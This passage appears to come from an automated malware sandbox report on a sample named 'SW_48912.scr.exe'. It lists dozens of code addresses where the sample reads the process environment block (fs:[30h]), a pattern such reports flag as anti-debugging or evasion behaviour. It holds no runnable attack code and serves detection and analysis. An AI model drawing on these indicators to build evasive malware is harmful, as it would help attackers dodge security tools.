                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01468243 mov eax, dword ptr fs:[00000030h]5_2_01468243
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01468243 mov ecx, dword ptr fs:[00000030h]5_2_01468243
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D823B mov eax, dword ptr fs:[00000030h]5_2_013D823B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B625D mov eax, dword ptr fs:[00000030h]5_2_014B625D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A250 mov eax, dword ptr fs:[00000030h]5_2_0149A250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A250 mov eax, dword ptr fs:[00000030h]5_2_0149A250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D826B mov eax, dword ptr fs:[00000030h]5_2_013D826B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6259 mov eax, dword ptr fs:[00000030h]5_2_013E6259
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA250 mov eax, dword ptr fs:[00000030h]5_2_013DA250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B62D6 mov eax, dword ptr fs:[00000030h]5_2_014B62D6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02A0 mov eax, dword ptr fs:[00000030h]5_2_013F02A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02A0 mov eax, dword ptr fs:[00000030h]5_2_013F02A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E284 mov eax, dword ptr fs:[00000030h]5_2_0141E284
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E284 mov eax, dword ptr fs:[00000030h]5_2_0141E284
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov ecx, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476500 mov eax, dword ptr fs:[00000030h]5_2_01476500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8550 mov eax, dword ptr fs:[00000030h]5_2_013E8550
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8550 mov eax, dword ptr fs:[00000030h]5_2_013E8550
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E5CF mov eax, dword ptr fs:[00000030h]5_2_0141E5CF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E5CF mov eax, dword ptr fs:[00000030h]5_2_0141E5CF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A5D0 mov eax, dword ptr fs:[00000030h]5_2_0141A5D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A5D0 mov eax, dword ptr fs:[00000030h]5_2_0141A5D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C5ED mov eax, dword ptr fs:[00000030h]5_2_0141C5ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C5ED mov eax, dword ptr fs:[00000030h]5_2_0141C5ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2582 mov eax, dword ptr fs:[00000030h]5_2_013E2582
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2582 mov ecx, dword ptr fs:[00000030h]5_2_013E2582
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01414588 mov eax, dword ptr fs:[00000030h]5_2_01414588
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E59C mov eax, dword ptr fs:[00000030h]5_2_0141E59C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E25E0 mov eax, dword ptr fs:[00000030h]5_2_013E25E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E65D0 mov eax, dword ptr fs:[00000030h]5_2_013E65D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014045B1 mov eax, dword ptr fs:[00000030h]5_2_014045B1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014045B1 mov eax, dword ptr fs:[00000030h]5_2_014045B1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140245A mov eax, dword ptr fs:[00000030h]5_2_0140245A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC427 mov eax, dword ptr fs:[00000030h]5_2_013DC427
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A456 mov eax, dword ptr fs:[00000030h]5_2_0149A456
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C460 mov ecx, dword ptr fs:[00000030h]5_2_0146C460
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D645D mov eax, dword ptr fs:[00000030h]5_2_013D645D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E64AB mov eax, dword ptr fs:[00000030h]5_2_013E64AB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A49A mov eax, dword ptr fs:[00000030h]5_2_0149A49A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E04E5 mov ecx, dword ptr fs:[00000030h]5_2_013E04E5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014144B0 mov ecx, dword ptr fs:[00000030h]5_2_014144B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146A4B0 mov eax, dword ptr fs:[00000030h]5_2_0146A4B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141674D mov esi, dword ptr fs:[00000030h]5_2_0141674D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141674D mov eax, dword ptr fs:[00000030h]5_2_0141674D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141674D mov eax, dword ptr fs:[00000030h]5_2_0141674D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422750 mov eax, dword ptr fs:[00000030h]5_2_01422750
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422750 mov eax, dword ptr fs:[00000030h]5_2_01422750
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01464755 mov eax, dword ptr fs:[00000030h]5_2_01464755
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146E75D mov eax, dword ptr fs:[00000030h]5_2_0146E75D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0710 mov eax, dword ptr fs:[00000030h]5_2_013E0710
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C700 mov eax, dword ptr fs:[00000030h]5_2_0141C700
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8770 mov eax, dword ptr fs:[00000030h]5_2_013E8770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h]5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01410710 mov eax, dword ptr fs:[00000030h]5_2_01410710
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C720 mov eax, dword ptr fs:[00000030h]5_2_0141C720
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C720 mov eax, dword ptr fs:[00000030h]5_2_0141C720
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0750 mov eax, dword ptr fs:[00000030h]5_2_013E0750
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145C730 mov eax, dword ptr fs:[00000030h]5_2_0145C730
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141273C mov eax, dword ptr fs:[00000030h]5_2_0141273C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141273C mov ecx, dword ptr fs:[00000030h]5_2_0141273C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141273C mov eax, dword ptr fs:[00000030h]5_2_0141273C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014607C3 mov eax, dword ptr fs:[00000030h]5_2_014607C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E07AF mov eax, dword ptr fs:[00000030h]5_2_013E07AF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146E7E1 mov eax, dword ptr fs:[00000030h]5_2_0146E7E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014027ED mov eax, dword ptr fs:[00000030h]5_2_014027ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014027ED mov eax, dword ptr fs:[00000030h]5_2_014027ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014027ED mov eax, dword ptr fs:[00000030h]5_2_014027ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E47FB mov eax, dword ptr fs:[00000030h]5_2_013E47FB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E47FB mov eax, dword ptr fs:[00000030h]5_2_013E47FB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148678E mov eax, dword ptr fs:[00000030h]5_2_0148678E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014947A0 mov eax, dword ptr fs:[00000030h]5_2_014947A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EC7C0 mov eax, dword ptr fs:[00000030h]5_2_013EC7C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E262C mov eax, dword ptr fs:[00000030h]5_2_013E262C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE627 mov eax, dword ptr fs:[00000030h]5_2_013FE627
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A660 mov eax, dword ptr fs:[00000030h]5_2_0141A660
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A660 mov eax, dword ptr fs:[00000030h]5_2_0141A660
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A866E mov eax, dword ptr fs:[00000030h]5_2_014A866E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A866E mov eax, dword ptr fs:[00000030h]5_2_014A866E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F260B mov eax, dword ptr fs:[00000030h]5_2_013F260B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01412674 mov eax, dword ptr fs:[00000030h]5_2_01412674
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E609 mov eax, dword ptr fs:[00000030h]5_2_0145E609
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422619 mov eax, dword ptr fs:[00000030h]5_2_01422619
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01416620 mov eax, dword ptr fs:[00000030h]5_2_01416620
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418620 mov eax, dword ptr fs:[00000030h]5_2_01418620
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FC640 mov eax, dword ptr fs:[00000030h]5_2_013FC640
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0141A6C7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A6C7 mov eax, dword ptr fs:[00000030h]5_2_0141A6C7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4690 mov eax, dword ptr fs:[00000030h]5_2_013E4690
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4690 mov eax, dword ptr fs:[00000030h]5_2_013E4690
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E6F2 mov eax, dword ptr fs:[00000030h]5_2_0145E6F2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E6F2 mov eax, dword ptr fs:[00000030h]5_2_0145E6F2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E6F2 mov eax, dword ptr fs:[00000030h]5_2_0145E6F2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E6F2 mov eax, dword ptr fs:[00000030h]5_2_0145E6F2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014606F1 mov eax, dword ptr fs:[00000030h]5_2_014606F1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014606F1 mov eax, dword ptr fs:[00000030h]5_2_014606F1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C6A6 mov eax, dword ptr fs:[00000030h]5_2_0141C6A6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014166B0 mov eax, dword ptr fs:[00000030h]5_2_014166B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460946 mov eax, dword ptr fs:[00000030h]5_2_01460946
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4940 mov eax, dword ptr fs:[00000030h]5_2_014B4940
